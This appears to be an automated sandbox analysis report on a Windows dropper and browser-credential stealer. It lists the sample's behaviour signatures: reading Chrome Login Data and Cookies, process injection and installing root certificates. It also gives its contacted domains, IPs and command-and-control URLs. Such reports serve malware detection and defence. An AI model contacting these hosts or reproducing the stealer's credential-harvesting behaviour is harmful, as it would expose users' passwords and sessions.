Source: C:\Users\user\Desktop\h1GodtbhC8.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError, 4_2_1001A0F0
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122EBBB cpuid 1_2_0122EBBB
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: GetLocaleInfoW,GetNumberFormatW, 1_2_0122A5BC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: GetLocaleInfoA, 4_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA, 21_2_026EF2DC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA,_strncpy, 21_2_026F0636
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 21_2_026F2A70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _strlen,EnumSystemLocalesA, 21_2_026F0B65
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 21_2_026F2B23
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _strlen,_strlen,EnumSystemLocalesA, 21_2_026F0B9C
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 21_2_026F2940
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 21_2_026F29FC
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat, 21_2_026F0C77
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _strlen,EnumSystemLocalesA, 21_2_026F0C22
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA,_xtoa_s@20, 21_2_04E8B5DD
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 21_2_04E95CD8
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 21_2_04E95D79
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 21_2_04E95D3D
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA, 21_2_04E95F69
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: GetLocaleInfoA, 21_2_04E9585F
Queries device information via Setup API
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 4_2_10019780
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E674FB1 GetSystemTimeAsFileTime, 0_2_6E674FB1
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E677DBD _free,GetTimeZoneInformation,_free, 0_2_6E677DBD
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406831
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E6294C0 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,FreeLibrary,CorBindToRuntimeEx,FreeLibrary,FreeLibrary,FreeLibrary, 0_2_6E6294C0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 327203 Sample: h1GodtbhC8.exe Startdate: 05/12/2020 Architecture: WINDOWS Score: 100 60 dream.pics 2->60 62 www.sodown.xyz 2->62 64 30 other IPs or domains 2->64 80 Multi AV Scanner detection for domain / URL 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 86 14 other signatures 2->86 11 h1GodtbhC8.exe 1 26 2->11         started        14 msiexec.exe 2->14         started        signatures3 process4 file5 52 C:\Users\user\AppData\Local\...\Sibuia.dll, PE32 11->52 dropped 54 C:\Users\user\AppData\...\h1GodtbhC8.exe.log, ASCII 11->54 dropped 56 C:\Users\user\AppData\Local\...\SibClr.dll, PE32 11->56 dropped 58 2 other files (none is malicious) 11->58 dropped 16 setup.exe 5 11->16         started        process6 file7 48 C:\Program Files (x86)\...\aliens.exe, PE32 16->48 dropped 19 aliens.exe 1 2 16->19         started        process8 dnsIp9 66 EF6DF4AF06BA6896.xyz 104.28.4.129, 49734, 49738, 49740 CLOUDFLARENETUS United States 19->66 68 ef6df4af06ba6896.xyz 19->68 50 C:\Users\user\...\1E1C360C582DF797.exe, PE32 19->50 dropped 88 Installs new ROOT certificates 19->88 90 Hides threads from debuggers 19->90 24 1E1C360C582DF797.exe 2 29 19->24         started        28 cmd.exe 19->28         started        30 1E1C360C582DF797.exe 1 15 19->30         started        32 msiexec.exe 4 19->32         started        file10 signatures11 process12 dnsIp13 70 1c5491a87d65f1ef.club 172.67.142.39, 443, 49739 CLOUDFLARENETUS United States 24->70 72 192.168.2.1 unknown unknown 24->72 78 2 other IPs or domains 24->78 92 Detected unpacking (creates a PE file in dynamic memory) 24->92 94 Machine Learning detection for dropped file 24->94 96 Tries to harvest and steal browser information (history, passwords, etc) 24->96 98 Contains functionality to detect sleep reduction / modifications 24->98 34 1607186572092.exe 24->34         started        36 1607186588295.exe 24->36         started        38 ThunderFW.exe 24->38         started        74 127.0.0.1 unknown unknown 28->74 100 Uses ping.exe to sleep 28->100 40 conhost.exe 28->40         started        42 PING.EXE 28->42         started        76 ef6df4af06ba6896.xyz 30->76 44 cmd.exe 30->44         started        signatures14 process15 process16 46 conhost.exe 44->46         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.142.39
 unknown United States
13335 CLOUDFLARENETUS false
104.28.4.129
 unknown United States
13335 CLOUDFLARENETUS false

Private
IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
ef6df4af06ba6896.xyz 104.28.4.129 true
cnchubstat.sandai.net 140.206.225.136 true
bgphub5u.sandai.net 39.98.57.143 true
iplogger.org 88.99.66.31 true
dream.pics 8.208.85.95 true
bgphub5pr.sandai.net 47.92.39.6 true
EF6DF4AF06BA6896.xyz 104.28.4.129 true
1c5491a87d65f1ef.club 172.67.142.39 true
cnc.hub5pnc.sandai.net 47.92.99.221 true
www.sodown.xyz 104.18.63.67 true
cnc.hub5pn.sandai.net 153.3.232.174 true
cncidx.m.hub.sandai.net 112.64.218.64 true
pmap.sandai.net 47.97.7.140 true
hub5c.hz.sandai.net unknown unknown
hub5idx.shub.hz.sandai.net unknown unknown
hub5u.hz.sandai.net unknown unknown
hub5sr.shub.hz.sandai.net unknown unknown
score.phub.hz.sandai.net unknown unknown
hubstat.hz.sandai.net unknown unknown
pmap.hz.sandai.net unknown unknown
hub5pr.hz.sandai.net unknown unknown
hub5pn.hz.sandai.net unknown unknown
imhub5pr.hz.sandai.net unknown unknown
hub5pnc.hz.sandai.net unknown unknown
relay.phub.hz.sandai.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ef6df4af06ba6896.xyz/info/w false
  • Avira URL Cloud: safe
 unknown
http://EF6DF4AF06BA6896.xyz/info/ddd false
  • Avira URL Cloud: safe
 unknown
http://ef6df4af06ba6896.xyz/info/du false
    		unknown
    http://ef6df4af06ba6896.xyz/info/g false
    • Avira URL Cloud: safe
    		 unknown
    http://ef6df4af06ba6896.xyz/info/e false
    • Avira URL Cloud: safe
    		 unknown
    http://ef6df4af06ba6896.xyz/info/r false
      		unknown